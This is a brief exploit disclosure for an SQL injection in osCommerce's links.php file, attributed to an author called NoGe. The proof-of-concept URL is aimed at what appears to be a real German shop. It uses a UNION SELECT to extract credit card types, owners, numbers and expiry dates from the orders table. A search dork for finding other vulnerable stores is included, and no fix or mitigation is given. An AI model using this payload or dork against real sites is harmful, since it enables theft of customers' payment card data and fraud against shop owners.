osCommerce SQL Injection Vuln


[o] osCommerce SQL Injection Vulnerability
Software : osCommerce
Vendor : http://www.oscommerce.com/
Download : http://www.oscommerce.com/solutions/downloads/
Author : NoGe

[o] Vulnerable file
links.php

[o] Exploithttp://localhost/[path]/links.php?link_id==[SQL]

[o] Proof of concept
http://www.sportmueller-pocking.de/catalog/links.php?link_id=12661+AND+1=2+UNION+SELECT+0,1,group_concat%28cc_type,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires%29,3,4,5,6,7,8+from+orders/*

[o] Dork
"Powered by osCommerce"

[o] Note
i dont know which version of this osCommerce but its vulnerable.
target not to much so i think this is an old version.